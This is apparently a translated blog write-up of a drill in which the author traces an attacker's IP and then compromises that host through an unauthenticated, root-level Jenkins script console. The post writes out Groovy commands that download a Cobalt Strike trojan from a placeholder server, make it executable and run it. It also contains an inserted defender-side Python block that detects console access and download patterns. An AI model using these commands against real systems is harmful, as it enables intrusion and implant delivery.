A record of a real engagement: tracing the attacker's source and getting a shell on the attacker's host


Preface

During an attack-and-defense drill, I traced the attacker's IP, delivered a Cobalt Strike (CS) Trojan through an existing vulnerability on that host, and successfully obtained a shell.


1. Find exploitable vulnerabilities

Information gathering on the attacker's IP showed that the host had several open ports.

Port 18080 (exploitation failed)

1. The port served the H3C ER5100G2 system management page; an attempt to log in with weak passwords failed.
2. After several login attempts a password hint ("y") was returned, but because the captcha cannot be reused, the password could not be brute-forced.

Port 443 (exploitation failed)

The port served a login page. Requesting a non-existent path produced an error page that disclosed Apache Tomcat/7.0.56, so I tried the Tomcat remote code execution vulnerability (CVE-2017-12615) and verified it with a PoC. The vulnerability could not be reproduced; it had already been fixed.

Port 12180 (exploited successfully)

Accessing port 12180 revealed an unauthenticated-access vulnerability: the Jenkins backend of the site could be reached directly and many administrative operations performed. Among them was the script console, which executes Groovy scripts and therefore arbitrary commands. Running a command through it showed that the Jenkins process was running with root permissions.
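A defender-side check for the misconfiguration described in this section, added here as example code that is not part of the original post: it flags script-console requests in a Jenkins access log (constructed sample lines in Apache combined format) and recognises the Groovy download-and-execute idioms that appear in the next section when a script body has been captured by a proxy or WAF. The endpoint names /script and /scriptText are Jenkins's real console paths; the log lines, IPs and timestamps are constructed.

```python
import re

# Constructed sample lines in Apache "combined" access-log format (not from the original post).
# Jenkins can write such a log through winstone's SimpleAccessLogger; the third field is the
# authenticated user and "-" means the request was anonymous.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Sep/2023:10:01:12 +0800] "GET /login HTTP/1.1" 200 3211 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Sep/2023:10:01:40 +0800] "GET /script HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
203.0.113.7 - - [05/Sep/2023:10:02:05 +0800] "POST /scriptText HTTP/1.1" 200 15 "-" "curl/7.68.0"
198.51.100.4 - admin [05/Sep/2023:10:03:00 +0800] "POST /script HTTP/1.1" 200 4102 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# /script is the interactive console page, /scriptText the endpoint tooling posts scripts to.
SCRIPT_CONSOLE_PATHS = {"/script", "/scriptText"}

def script_console_hits(log_text):
    """Return (ip, user, method, path, status) for every request to the Groovy script console."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0].rstrip("/")
        if path in SCRIPT_CONSOLE_PATHS:
            hits.append((m["ip"], m["user"], m["method"], path, int(m["status"])))
    return hits

def anonymous_console_use(log_text):
    """Successful console requests with no authenticated user: the misconfiguration the post abused."""
    return [h for h in script_console_hits(log_text) if h[1] == "-" and h[4] == 200]

# Groovy idioms used in the post: shell out via String.execute(), fetch a file over HTTP,
# and mark it executable. Apply to a script body captured by a proxy or WAF in front of Jenkins.
GROOVY_EXEC_RE = re.compile(r'["\'][^"\']*["\']\s*\.execute\s*\(')
DOWNLOAD_RE = re.compile(r'\b(?:curl|wget)\b[^\n]*https?://')
CHMOD_RE = re.compile(r'\bchmod\s+\+x\b')

def classify_groovy(script):
    """Return the reasons a captured script-console payload looks like command execution."""
    reasons = []
    if GROOVY_EXEC_RE.search(script):
        reasons.append("shell command via String.execute()")
    if DOWNLOAD_RE.search(script):
        reasons.append("downloads a remote file")
    if CHMOD_RE.search(script):
        reasons.append("makes a file executable")
    return reasons
```

Any hit returned by anonymous_console_use means the console is reachable without login; the fix is to enable security and restrict Overall/RunScripts to administrators, and to alert on the paths above regardless of user.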

2. Exploiting the vulnerability getshell

Use the CrossC2 plug-in for CS to generate the Trojan "test", and host the file on the server's web service.

In the Jenkins script console, run println "curl http://xxxxxx:8080/test -o /test".execute().text to download the Trojan "test" from the server. Then run println "ls -al".execute().text to confirm that the file has appeared in the root directory; it had no execute permission yet.

println "chmod +x /test".execute().text gives the Trojan execute permission.

Run the Trojan "test": it came online successfully. The egress IP of the compromised server is the same as the website's IP. ps -ef shows the Jenkins process serving the website, and ifconfig shows that the Ethernet card is named HVVaddr.

At this point, the attacker's server permissions have been successfully obtained.


Summary

This article is a real record of an attack-and-defense exercise. Please use the Internet in a civilized and lawful manner, and do not illegally attack other people's websites.


Source: blog.csdn.net/qq_51690690/article/details/132706802